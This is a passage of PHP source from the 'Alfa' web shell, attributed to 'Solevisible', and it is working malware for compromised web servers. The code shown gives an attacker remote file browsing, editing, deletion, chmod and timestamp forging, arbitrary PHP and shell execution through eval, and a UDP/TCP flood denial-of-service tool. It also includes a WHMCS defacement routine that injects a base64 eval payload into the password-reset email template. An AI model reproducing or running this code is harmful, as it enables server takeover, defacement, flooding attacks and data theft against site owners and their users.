$mime = explode(“:”, alfaEx(“file –mime-type ‘”.addslashes($_POST['alfa1']).”‘”));
$mimetype = $mime[1];
if(!empty($mimetype)){
if(strstr($mimetype, “image”)){
$_POST['alfa2'] = ‘image’;
}
}
}
}
}
}
if($_POST['alfa2'] == “rename” && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}
if(@$_POST['alfa2'] == ‘mkfile’){
$_POST['alfa1'] = trim($_POST['alfa1']);
if($chdir_fals&&$alfa_canruncmd){
if(_alfa_is_writable($_POST["c"])){
alfaEx(“cd ‘”.addslashes($_POST["c"]).”‘;touch ‘”.addslashes($alfa1_decoded).”‘”);
$_POST['alfa2'] = “edit”;
}
}
if(!@file_exists($_POST['alfa1'])){
$fp = @fopen($_POST['alfa1'], ‘w’);
if($fp){
$_POST['alfa2'] = “edit”;
fclose($fp);
}
}else{
$_POST['alfa2'] = “edit”;
}
}
if(!_alfa_file_exists(@$_POST['alfa1'])){
echo __pre().”<center><p><div class=\”txtfont\”><font color=’red’>!…FILE DOEST NOT EXITS…!</font></div></p></center></div><script>editor_error=false;removeHistory(‘”.$_POST['alfa4'].”‘);</script>”;
alfaFooter();
return;
}
if($chdir_fals){
$filesize = $file_info[3];
$uid["name"] = $file_info[1];
$gid["name"] = $file_info[2];
$permcolor = alfaPermsColor(array(“class”=>$perm_color_class,”num”=>$file_info[5],”human”=>$file_info[6]),true);
}else{
$uid = function_exists(“posix_getpwuid”)&&function_exists(“fileowner”)?@posix_getpwuid(@fileowner($_POST['alfa1'])):”;
$gid = function_exists(“posix_getgrgid”)&&function_exists(“filegroup”)?@posix_getgrgid(@filegroup($_POST['alfa1'])):”;
if(!$uid&&!$gid){
$uid['name'] = function_exists(“fileowner”)?@fileowner($_POST['alfa1']):”;
$gid['name'] = function_exists(“filegroup”)?@filegroup($_POST['alfa1']):”;
}
$permcolor = alfaPermsColor($_POST['alfa1']);
$filesize = @filesize($_POST['alfa1']);
if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){
if(_alfa_can_runCommand()){
list($uid['name'],$gid['name']) = explode(“:”, alfaEx(‘stat -c “%U:%G” “‘.addslashes($_POST["c"].”/”.$_POST["alfa1"]).’”‘));
}
}
}
echo ‘<span class=”editor_file_info_vars”>Name:</span> ‘.htmlspecialchars($alfa1_decoded).’ <span class=”editor_file_info_vars”>Size:</span> ‘.alfaSize($filesize).’ <span class=”editor_file_info_vars”>Permission:</span> ‘.$permcolor.’ <span class=”editor_file_info_vars”>Owner/Group:</span> ‘.$uid['name'].’/’.$gid['name'].’ <span class=”editor_file_info_vars”>Directory:</span> ‘.str_replace(“//”, “/”,($chdir_fals?””:$_POST['c'].’/’).$_POST['alfa1']).’<br><br>’;
if(empty($_POST['alfa2']))$_POST['alfa2'] = ‘view’;
if(!_alfa_is_dir($_POST['alfa1'])){
$m = array(‘View’, ‘Edit’, ‘Download’, ‘Highlight’, ‘Chmod’, ‘Rename’, ‘Touch’, ‘Delete’, ‘Image’, ‘Hexdump’);
$ftype = “file”;
}else{
$m = array(‘Chmod’, ‘Rename’, ‘Touch’);
$ftype = “dir”;
}
foreach($m as $v)
echo $v == ‘Delete’ ? ‘<a href=”javascript:void(0);” onclick=”var chk=confirm(\’Are You Sure For Delete This File ?\’);chk?editor(\”.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).’\’,\”.strtolower($v).’\’,\’\’,\”.$_POST['c'].’\’,\”.$_POST['alfa4'].’\’,\”.$ftype.’\’):\’\’;”><span class=”editor_actions”>’.((strtolower($v)==@$_POST['alfa2'])?’<b><span class=”editor_actions”> ‘.$v.’ </span> </b>’:$v).’ | </span></a> ‘ : ‘<a href=”javascript:void(0);” onclick=”editor(\”.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).’\’,\”.strtolower($v).’\’,\’\’,\”.$_POST['c'].’\’,\”.$_POST['alfa4'].’\’,\”.$ftype.’\’)”><span class=”editor_actions”>’.((strtolower($v)==@$_POST['alfa2'])?’<b><span class=”editor_actions”> ‘.$v.’ </span> </b>’:$v).’ | </span></a>’;
echo ‘<br><br>’;
switch($_POST['alfa2']){
case ‘view’:
@chdir($_POST['c']);
echo ‘<div class=”editor-view”><div class=”view-content”><p><button style=”border-radius:10px;” class=”button” onClick=”copyToClipboard(\’view_ml_content\’);”>copy to clipboard</button></p><pre class=”ml1″ id=”view_ml_content”>’;
echo htmlspecialchars(__read_file($_POST['alfa1']));
echo ‘</pre></div></div>’;
break;
case ‘highlight’:
@chdir($_POST['c']);
if(@is_readable($_POST['alfa1'])){
echo ‘<div class=”editor-view”><div class=”view-content”><div class=”ml1″ style=”background-color: #e1e1e1;color:black;”>’;
$code = @highlight_file($_POST['alfa1'],true);
echo str_replace(array(‘<span ‘,’</span>’), array(‘<font ‘,’</font>’),$code).’</div></div></div>’;
}
break;
case ‘delete’:
@chdir($_POST['c']);
if(@is_writable($_POST['alfa1'])||isset($GLOBALS["glob_chdir_false"])){
$deleted = true;
if(!@unlink($_POST['alfa1'])){
$deleted = false;
if($alfa_canruncmd){
if(_alfa_is_writable($_POST['alfa1'])){
alfaEx(“rm -f ‘”.addslashes($_POST['alfa1']).”‘”);
$deleted = true;
}
}
}
if($deleted)echo ‘File Deleted…<script>var elem = $(“‘.$_POST['alfa4'].’”).parentNode;elem.parentNode.removeChild(elem);delete editor_files[“‘.$_POST['alfa4'].’”];</script>’;else echo ‘Error…’;}
break;
case ‘chmod’:
@chdir($_POST['c']);
if(!empty($_POST['alfa3'])){
$perms = 0;
for($i=strlen($_POST['alfa3'])-1;$i>=0;–$i)
$perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
if(!@chmod($_POST['alfa1'], $perms)){
if($chdir_fals&&$alfa_canruncmd){
alfaEx(“cd ‘”.addslashes($_POST["c"]).”‘;chmod “.addslashes($_POST['alfa3']).” ‘”.addslashes($alfa1_decoded).”‘”);
echo(‘Success!’);
}else{
echo ‘<font color=”#FFFFFF”><b>Can\’t set permissions!</b></font><br><script>document.mf.alfa3.value=””;</script>’;}
}else{echo(‘Success!’);}
}
clearstatcache();
AlfaNum(8,9,10,7,6,5,4,2,1);
if($chdir_fals){
$file_perm = $file_info[5];
}else{
$file_perm = substr(sprintf(‘%o’, @fileperms($_POST['alfa1'])),-4);
}
echo ‘<script>alfa3_=””;</script><form onsubmit=”editor(\”.addslashes($_POST['alfa1']).’\’,\”.$_POST['alfa2'].’\’,this.chmod.value,\”.$_POST['c'].’\’,\”.$_POST['alfa4'].’\’,\”.$ftype.’\’);return false;”><input type=”text” name=”chmod” value=”‘.$file_perm.’”><input type=submit value=” “></form>’;
break;
case ‘edit’:
@chdir($_POST['c']);
if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){
echo ‘File isn\’t writeable’;
break;
}
if(!empty($_POST['alfa3'])){
$_POST['alfa3'] = substr($_POST['alfa3'],1);
$time = @filemtime($_POST['alfa1']);
$fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
if($chdir_fals&&$alfa_canruncmd){
$rname = $alfa1_decoded;
$randname = $rname.rand(111,9999);
$filepath = dirname($_SERVER["SCRIPT_FILENAME"]).”/”.$randname;
if($fp = @__write_file($filepath ,$_POST['alfa3'])){
alfaEx(“mv ‘”.addslashes($filepath).”‘ ‘”.addslashes($_POST["alfa1"]).”‘;rm -f ‘”.addslashes($filepath).”‘”);
}
}
if($fp){
echo ‘Saved!<br><script>alfa3_=””;</script>’;
@touch($_POST['alfa1'],$time,$time);
}
}
echo ‘<button class=”button” style=”border-radius:10px;” onClick=”copyToClipboard(\’edit_textarea_content\’);”>copy to clipboard</button><form id=”editor_edit_area” onsubmit=”editor(\”.addslashes($alfa1_decoded).’\’,\”.$_POST['alfa2'].’\’,\’1\’+this.text.value,\”.$_POST['c'].’\’,\”.$_POST['alfa4'].’\’,\”.$ftype.’\’);return false;”><p><input type=”submit” value=” “></p><textarea name=”text” id=”edit_textarea_content” class=”bigarea” onkeydown=”saveByKey(event);”>’;
echo htmlspecialchars(__read_file($_POST['alfa1']));
echo ‘</textarea><p><input type=”submit” value=” “></p></form>’;
break;
case ‘hexdump’:
@chdir($_POST['c']);
$c = __read_file($_POST['alfa1']);
$n = 0;
$h = array(’00000000<br>’,”,”);
$len = strlen($c);
for ($i=0; $i<$len; ++$i) {
$h[1] .= sprintf(‘%02X’,ord($c[$i])).’ ‘;
switch ( ord($c[$i]) ) {
case 0: $h[2] .= ‘ ‘; break;
case 9: $h[2] .= ‘ ‘; break;
case 10: $h[2] .= ‘ ‘; break;
case 13: $h[2] .= ‘ ‘; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i+1 < $len) {$h[0] .= sprintf(‘%08X’,$i+1).’<br>’;}
$h[1] .= ‘<br>’;
$h[2] .= “\n”;
}
}
echo ‘<div class=”editor-view”><div class=”view-content”><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style=”font-weight: normal;”><pre>’.$h[0].’</pre></span></td><td bgcolor=#282828><pre>’.$h[1].’</pre></td><td bgcolor=#333333><pre>’.htmlspecialchars($h[2]).’</pre></td></tr></table></div></div>’;
break;
case ‘rename’:
@chdir($_POST['c']);
$alfa1_escape = addslashes($_POST["alfa1"]);
$alfa3_escape = addslashes($_POST["alfa3"]);
if(!empty($_POST['alfa3'])){
$cmd_rename = false;
if($chdir_fals&&$alfa_canruncmd){
if(_alfa_is_writable($_POST['alfa1'])){
$alfa1_escape = addslashes($alfa1_decoded);
alfaEx(“cd ‘”.addslashes($_POST['c']).”‘;mv ‘”.$alfa1_escape.”‘ ‘”.addslashes($_POST['alfa3']).”‘”);
}else{
$cmd_rename = true;
}
}else{
$alfa1_escape = addslashes($_POST["alfa1"]);
}
if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){
echo ‘Can\’t rename!<br>’;}else{echo(‘Renamed!<script>try{$(“‘.$_POST['alfa4'].’”).innerHTML = “<div class=\’editor-icon\’>”+loadType(\”.$alfa3_escape.’\’,\”.$ftype.’\’,\”.$_POST['alfa4'].’\’)+”</div><div class=\’editor-file-name\’>’.$alfa3_escape.’</div>”;editor_files[“‘.$_POST['alfa4'].’”].file = “‘.$alfa3_escape.’”;d.files.innerHTML = d.files.innerHTML.replace(/\\\”.$alfa1_escape.’\\\’/g, “\”.$alfa3_escape.’\’”);d.files.innerHTML = d.files.innerHTML.replace(/value\=\”‘.$alfa1_escape.’\”/, \’value\=\”‘.$alfa3_escape.’\”\’);d.files.innerHTML = d.files.innerHTML.replace(/’.$alfa1_escape.’\<\/a\>/g, “‘.$alfa3_escape.’</a>”);d.files.innerHTML = d.files.innerHTML.replace(/Are You Sure For Delete # ‘.$alfa1_escape.’ # \?/, “Are You Sure For Delete # ‘.$alfa3_escape.’ # ?”);’.($ftype == “dir”?”updateDirsEditor(‘”.$_POST['alfa4'].”‘,’”.$alfa1_escape.”‘);”:””).’}catch(e){console.log(e)}</script>’);$alfa1_escape = $alfa3_escape;}
}
echo ‘<form onsubmit=”editor(\”.$alfa1_escape.’\’,\”.$_POST['alfa2'].’\’,this.name.value,\”.$_POST['c'].’\’,\”.$_POST['alfa4'].’\’,\”.$ftype.’\’);return false;”><input type=”text” name=”name” value=”‘.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=”?$_POST['alfa3']:$alfa1_decoded)).’”><input type=submit value=” “></form>’;
break;
case ‘touch’:
@chdir($_POST['c']);
if( !empty($_POST['alfa3']) ) {
$time = strtotime($_POST['alfa3']);
if($time){
$touched = false;
if($chdir_fals&&$alfa_canruncmd){
alfaEx(“cd ‘”.addslashes($_POST["c"]).”‘;touch -d ‘”.htmlspecialchars(addslashes($_POST['alfa3'])).”‘ ‘”.addslashes($alfa1_decoded).”‘”);
$touched = true;
}
if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)
echo ‘Fail!’;
else
echo ‘Touched!’;
} else echo ‘Bad time format!’;
}
clearstatcache();
echo ‘<script>alfa3_=””;</script><form onsubmit=”editor(\”.addslashes($_POST['alfa1']).’\’,\”.$_POST['alfa2'].’\’,this.touch.value,\”.$_POST['c'].’\’,\”.$_POST['alfa4'].’\’,\”.$ftype.’\’);return false;”><input type=text name=touch value=”‘.date(“Y-m-d H:i:s”, ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).’”><input type=submit value=” “></form>’;
break;
case ‘image’:
@chdir($_POST['c']);
echo(‘<hr>’);
$file = $_POST['alfa1'];
$image_info = @getimagesize($file);
if(is_array($image_info)||$chdir_fals){
$width = (int)$image_info[0];
$height = (int)$image_info[1];
if($chdir_fals&&$alfa_canruncmd){
$source = alfaEx(“cat ‘”.addslashes($file).”‘ | base64″);
list($width, $height) = explode(“:”, alfaEx(“identify -format ‘%w:%h’ ‘”.addslashes($file).”‘”));
$mime = explode(“:”, alfaEx(“file –mime-type ‘”.addslashes($file).”‘”));
$image_info['mime'] = $mime[1];
}else{
$source = __ZW5jb2Rlcg(__read_file($file, false));
}
$image_info_h = “Image type = <span>[</span> “.$image_info['mime'].” <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>”;
if($width > 800){$width = 800;}
echo $content = “<div class=’editor-view’><div class=’view-content’><center>”.$image_info_h.”<br><img id=’viewImage’ style=’max-width:100%;border:1px solid green;’ src=’data:”.$image_info['mime'].”;base64,”.$source.”‘ alt=’”.$file.”‘></center></div></div><br>”;
}
break;
}
echo ‘</div>’;
alfaFooter();
}
function findicon($file,$type){
$s = ‘http://solevisible.com/icons/’;
$types = array(‘json’,’ppt’,’pptx’,’xls’,’xlsx’,’msi’,’config’,’cgi’,’pm’,’c’,’cpp’,’cs’,’java’,’aspx’,’asp’,’db’,’ttf’,’eot’,’woff’,’woff2′,’woff’,’conf’,’log’,’apk’,’cab’,’bz2′,’tgz’,’dmg’,’izo’,’jar’,’7z’,’iso’,’rar’,’bat’,’sh’,’alfa’,’gz’,’tar’,’php’,’php4′,’php5′,’phtml’,’html’,’xhtml’,’shtml’,’htm’,’zip’,’png’,’jpg’,’jpeg’,’gif’,’bmp’,’ico’,’txt’,’js’,’rb’,’py’,’xml’,’css’,’sql’,’htaccess’,’pl’,’ini’,’dll’,’exe’,’mp3′,’mp4′,’m4a’,’mov’,’flv’,’swf’,’mkv’,’avi’,’wmv’,’mpg’,’mpeg’,’dat’,’pdf’,’3gp’,’doc’,’docx’,’docm’);
if($type!=’file’){
return ($file==’..’?$s.’back.png’:$s.’folder.png’);
}else{
$ext = explode(‘.’,$file);
$ext = end($ext);
$ext = strtolower($ext);
return (in_array($ext,$types)?$s.$ext.’.png’:$s.’notfound.png’);
}
}
function alfadlfile(){
if(isset($_POST['c'],$_POST['file'])){
$basename = rawurldecode(basename($_POST['file']));
$_POST['file'] = str_replace(“//”, “/”, $_POST['c'].’/’.$basename);
$alfa_canruncmd = _alfa_can_runCommand(true,true);
if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){
ob_start(“ob_gzhandler”, 4096);
header(“Content-Disposition: attachment; filename=\””.addslashes($basename).”\””);
header(“Content-Type: application/octet-stream”);
if(isset($GLOBALS["glob_chdir_false"])){
$randname = $basename.rand(111,9999);
$scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
$filepath = $scriptpath.”/”.$randname;
if(_alfa_is_writable($scriptpath)){
alfaEx(“cp ‘”.addslashes($_POST["file"]).”‘ ‘”.addslashes($filepath).”‘”);
readfile($filepath);
@unlink($filepath);
}else{
alfaEx(“cat ‘”.addslashes($_POST["file"]).”‘”);
}
}else{
readfile($_POST['file']);
}
}else echo(‘Error…!’);}}
function alfaphpeval(){
alfahead();
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == ‘ini’)){
echo ‘<div class=header>’;
ob_start();
$INI=ini_get_all();
print ‘<table border=0><tr>’
.’<td class=”listing”><font class=”highlight_txt”>Param</td>’
.’<td class=”listing”><font class=”highlight_txt”>Global value</td>’
.’<td class=”listing”><font class=”highlight_txt”>Local Value</td>’
.’<td class=”listing”><font class=”highlight_txt”>Access</td></tr>’;
foreach ($INI as $param => $values)
print “\n”.’<tr>’
.’<td class=”listing”><b>’.$param.’</td>’
.’<td class=”listing”>’.$values['global_value'].’ </td>’
.’<td class=”listing”>’.$values['local_value'].’ </td>’
.’<td class=”listing”>’.$values['access'].’ </td></tr>’;
$tmp = ob_get_clean();
$tmp = preg_replace(‘!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU’,”,$tmp);
$tmp = preg_replace(‘!td, th {(.*)}!msiU’,’.e, .v, .h, .h th {$1}’,$tmp);
echo str_replace(‘<h1′,’<h2′, $tmp) .’</div><br>’;
}
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == ‘info’)) {
echo ‘<div class=header><style>.p {color:#000;}</style>’;
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace(‘!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU’,”,$tmp);
$tmp = preg_replace(‘!td, th {(.*)}!msiU’,’.e, .v, .h, .h th {$1}’,$tmp);
echo str_replace(‘<h1′,’<h2′, $tmp) .’</div><br>’;
}
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == ‘exten’)) {
echo ‘<div class=header>’;
ob_start();
$EXT=get_loaded_extensions();
echo ‘<table border=0><tr><td class=”listing”>’.implode(‘</td></tr>’.”\n”.’<tr><td class=”listing”>’, $EXT).’</td></tr></table>’.count($EXT).’ extensions loaded’;
echo ‘</div><br>’;
}
$lang_html = “”;
foreach(array(“php”=>”php ~> [ Windows / Linux ]“,”perl”=>”perl ~> [ Linux ]“,”python”=>”python ~> [ Linux ]“,”bash”=>”bash ~> [ Linux ]“) as $key=>$val){$lang_html .= ‘<option value=”‘.$key.’” ‘.($_POST["alfa3"]==$key?”selected”:””).’>’.$val.’</option>’;}
echo ‘<div class=header><Center><a href=javascript:void(0) onclick=”g(\’phpeval\’,null,\’\’,\’ini\’)”>| INI_INFO | </a><a href=javascript:void(0) onclick=”g(\’phpeval\’,null,\’\’,\’info\’)”> | phpinfo |</a><a href=javascript:void(0) onclick=”g(\’phpeval\’,null,\’\’,\’exten\’)”> | extensions |</a></center><br><form name=pf method=post onsubmit=”g(\’phpeval\’,null,this.code.value,null,this.language.value); return false;”><div class=”txtfont”>Select Language: </div> <select name=”language” style=”width:300px;”>’.$lang_html.’</select><br><br><textarea placeholder=”file_get_contents(\’/etc/passwd\’);” name=code class=bigarea id=PhpCode>’.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):”).’</textarea><center><input type=”submit” value=”” style=”margin-top:5px”></center>’;
echo ‘</form><pre id=PhpOutput style=”‘.(empty($_POST['alfa1'])?’display:none;’:”).’margin-top:5px;” class=ml1>’;
if(!empty($_POST['alfa1'])){
if($_POST['alfa3']==”php”){
ob_start();
eval($_POST['alfa1']);
$result = htmlspecialchars(ob_get_clean());
}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]==”unix”){
if(isset($_SESSION["eval_tmpdir"])){
$tempdir = $_SESSION["eval_tmpdir"];
}else{
$tempdir = dirname(alfaEx(“mktemp”));
$_SESSION["eval_tmpdir"] = $tempdir;
}
$lang = $_POST['alfa3'];
$filename = “temp”.rand(11111,99999);
$temp = $tempdir.”/”.$filename ;
__write_file($filename, $_POST['alfa1']);
$result = alfaEx(“mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}”);
@unlink($filename);
@unlink($temp);
}
echo ‘<textarea class=bigarea id=”PhpCode”>’.$result.’</textarea>’;
}
echo ‘</pre></div>’;
alfafooter();
}
function alfahash(){
if(!function_exists(‘hex2bin’)) {function hex2bin($p) {return decbin(hexdec($p));}}
if(!function_exists(‘full_urlencode’)) {function full_urlencode($p){$r=”;for($i=0;$i<strlen($p);++$i)$r.= ‘%’.dechex(ord($p[$i]));return strtoupper($r);}}
$stringTools = array(
‘Base64_encode ( $string )’ => ‘__ZW5jb2Rlcg($s)’,
‘Base64_decode ( $string )’ => ‘__ZGVjb2Rlcg($s)’,
‘strrev ( $string )’ => ‘strrev($s)’,
‘bin2hex ( $string )’ => ‘bin2hex($s)’,
‘hex2bin ( $string )’ => ‘hex2bin($s)’,
‘md5 ( $string )’ => ‘md5($s)’,
‘sha1 ( $string )’ => ‘sha1($s)’,
‘hash ( “sha251″, $string ) –> sha251′ => ‘hash(“sha256″,$s)’,
‘hash ( “sha384″, $string ) –> sha384′ => ‘hash(“sha384″,$s)’,
‘hash ( “sha512″, $string ) –> sha512′ => ‘hash(“sha512″,$s)’,
‘crypt ( $string )’ => ‘crypt($s)’,
‘crc32 ( $string )’ => ‘crc32($s)’,
‘str_rot13 ( $string )’ => ‘str_rot13($s)’,
‘urlencode ( $string )’ => ‘urlencode($s)’,
‘urldecode  ( $string )’ => ‘urldecode($s)’,
‘full_urlencode  ( $string )’ => ‘full_urlencode($s)’,
‘htmlspecialchars  ( $string )’ => ‘htmlspecialchars($s)’,
‘base64_encode (gzdeflate( $string , 9)) –> Encode’ => ‘__ZW5jb2Rlcg(gzdeflate($s, 9))’,
‘gzinflate (base64_decode( $string )) –> Decode’ => ‘@gzinflate(__ZGVjb2Rlcg($s))’,
‘str_rot13 (base64_encode( $string )) –> Encode’ => ‘str_rot13(__ZW5jb2Rlcg($s))’,
‘base64_decode (str_rot13( $string )) –> Decode’ => ‘__ZGVjb2Rlcg(str_rot13($s))’,
‘str_rot13 (base64_encode(gzdeflate( $string , 9))) –> Encode’ => ‘str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))’,
‘gzinflate (base64_decode(str_rot13( $string ))) –> Decode’ => ‘@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))’,
);
alfahead();
echo ‘<div class=header>’;
echo “<form onSubmit=’g(\”hash\”,null,this.selectTool.value,this.input.value);return false;’><div class=’txtfont’>Method:</div> <select name=’selectTool’ style=’width:400px;’>”;
foreach($stringTools as $k => $v)
echo “<option value=’”.htmlspecialchars($v).”‘ “.($_POST['alfa1']==$v?’selected’:”).”>”.$k.”</option>”;
echo “</select> <input type=’submit’ value=’ ‘/><br><textarea  name=’input’ style=’margin-top:5px’ class=’bigarea’>”.(empty($_POST['alfa1'])?”:htmlspecialchars(@$_POST['alfa2'])).”</textarea></form>”;
if(!empty($_POST['alfa1'])){
$string = addslashes($_POST['alfa2']);
$string = str_replace(‘\”‘,’”‘,$string);
$alg = $_POST['alfa1'];
$code = str_replace(‘$s’,”‘”.$string.”‘”,$alg);
ob_start();
eval(‘echo ‘.$code.’;’);
$res = ob_get_contents();
ob_end_clean();
if(in_array($alg, $stringTools))echo ‘<textarea class=”bigarea” id=”PhpCode”>’.htmlspecialchars($res).’</textarea>’;
}
echo “</div>”;
alfaFooter();
}
function alfados(){
alfahead();
echo ‘<div class=header>’;
echo ‘<center><p><div class=”txtfont_header”>| DOS |</div></p><form onSubmit=”g(\’dos\’,null,this.host.value,this.time.value,this.port.value,this.m.value); return false;”><div class=”txtfont”>Method : <select name=”m” style=”width:80px;”><option value=”udp”>UDP</option><option value=”tcp”>TCP</option></select> Host : <input name=”host” type=”text” value=”localhost” size=”25″ /> Time : <input name=”time” type=”text” size=”15″ /> Port : <input name=”port” type=”text” size=”10″ /> <input type=”submit” value=” ” /></div></form></center><br>’;
if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){
echo __pre();
$packets=0;
ignore_user_abort(true);
$exec_time=(int)$_POST['alfa2'];
$time=time();
$max_time=$exec_time+$time;
$host=$_POST['alfa1'];
$port=(int)$_POST['alfa3'];
$method=$_POST['alfa4'];
$out = str_repeat(‘X’,65000);
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = @fsockopen($method.’://’.$host, $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo “<center>$packets (” . @round(($packets*65)/1024, 2) . ” MB) packets averaging “. @round($packets/$exec_time, 2) . ” packets per second</center>”;
echo “</pre>”;
}
echo ‘</div>’;
alfafooter();
}
function __pre(){return(‘<pre id=”strOutput” style=”margin-top:5px” class=”ml1″>’);}
function alfaIndexChanger(){
alfahead();

echo ‘<div class=header><center><p><div class=”txtfont_header”>| Index Changer |</div></p><h3><a href=javascript:void(0) onclick=”g(\’IndexChanger\’,null,null,null,\’whmcs\’)”>| Whmcs | </a><a href=javascript:void(0) onclick=”g(\’IndexChanger\’,null,\’vb\’,null)”>| vBulletin | </a><a href=javascript:void(0) onclick=”g(\’IndexChanger\’,null,null,\’mybb\’)”>| MyBB | </a></h3></center>’;
if(isset($_POST['alfa3'])&&($_POST['alfa3'] == ‘whmcs’)){
echo __pre();

echo “<center><center><div class=’txtfont_header’>| Whmcs |</div>
<p><center>”.getConfigHtml(‘whmcs’).”<form onSubmit=\”g(‘IndexChanger’,null,null,null,’whmcs’,this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\”>
“;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Mysql Host’, ‘inputName’ => ‘dbh’, ‘id’ => ‘db_host’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘URL’, ‘inputName’ => ‘path’, ‘inputValue’ => ‘http://site.com/whmcs’, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘File Name’, ‘inputName’ => ‘fname’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Name’, ‘inputName’ => ‘dbn’, ‘id’ => ‘db_name’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td5′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db User’, ‘inputName’ => ‘dbu’, ‘id’ => ‘db_user’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td6′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Pass’, ‘inputName’ => ‘dbp’, ‘id’ => ‘db_pw’, ‘inputValue’ => ”, ‘inputSize’ => ’50′)
);
create_table($table);
echo “<br><div class=’txtfont’>| Your Index |</div><br>
<textarea name=index rows=’19′ cols=’103′><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
<input type=’submit’ value=’ ‘>
</form></center></center>”;
if(isset($_POST['alfa6'])){
$s0levisible=”Powered By Solevisible”;
$dbu = $_POST['alfa6'];
$path = $_POST['alfa5'];
$fname = $_POST['alfa4'];
$dbn = $_POST['alfa7'];
$dbp = $_POST['alfa8'];
$dbh = $_POST['alfa9'];
$index = $_POST['alfa10'];
$index = str_replace(“\’”,”‘”,$index);
$deface = ‘$x = base64_decode(“‘.__ZW5jb2Rlcg($index).’”); $solevisible = fopen(“‘.$fname.’”,”w”); fwrite($solevisible,$x);’;
$saveData = __ZW5jb2Rlcg($deface);
$Def = ‘{php}eval(base64_decode(“‘.$saveData.’”));{/php}’;
if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
$soleSave=@mysqli_query($conn,”select message from tblemailtemplates where name=’Password Reset Validation’”);
$soleGet = mysqli_fetch_assoc($soleSave);
$tempSave1 = $soleGet['message'];
$tempSave = str_replace(“‘”,”\’”,$tempSave1);
$inject = “UPDATE tblemailtemplates SET message=’$Def’ WHERE name=’Password Reset Validation’”;
$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
$create = “insert into tblclients (email) values(‘solevisible@fbi.gov’)”;
$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
if(function_exists(‘curl_version’)){
$AlfaSole = new AlfaCURL(true);
$saveurl = $AlfaSole->Send($path.”/pwreset.php”);
$getToken = preg_match(“/name=\”token\” value=\”(.*?)\”/i”,$saveurl,$token);
$AlfaSole->Send($path.”/pwreset.php”,”post”,”token={$token[1]}&action=reset&email=solevisible@fbi.gov”);
$backdata = “UPDATE tblemailtemplates SET message=’{$tempSave}’ WHERE name=’Password Reset Validation’”;
$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
__alert(‘File Created…’);
echo “<br><pre id=\”strOutput\” style=\”margin-top:5px\” class=\”ml1\”><br><center><font color=red><a target=’_blank’ href=’”.$path.”/”.$fname.”‘>Click Here !</a></font></b></center><br><br>”;
}else{
echo “<br><pre id=\”strOutput\” style=\”margin-top:5px\” class=\”ml1\”><br><center><b><font color=\”#FFFFFF\”>Please go to Target </font><font color=red>\” “.$path.”/pwreset.php \”</font><br/><font color=\”#FFFFFF\”> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\”#FFFFFF\”>and go to</font> <font color=red>\” “.$path.”/”.$fname.” \”</font></b></center><br><br>”;
}}}}
if(isset($_POST['alfa1']) && ($_POST['alfa1'] == ‘vb’)){
echo __pre();

echo “<center><center><div class=’txtfont_header’>| vBulletin |</div>
<p><center>”.getConfigHtml(‘vb’).”<form onSubmit=\”g(‘IndexChanger’,null,’vb’,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,’>>’); return false;\”>
“;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Mysql Host’, ‘inputName’ => ‘dbh’, ‘id’ => ‘db_host’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
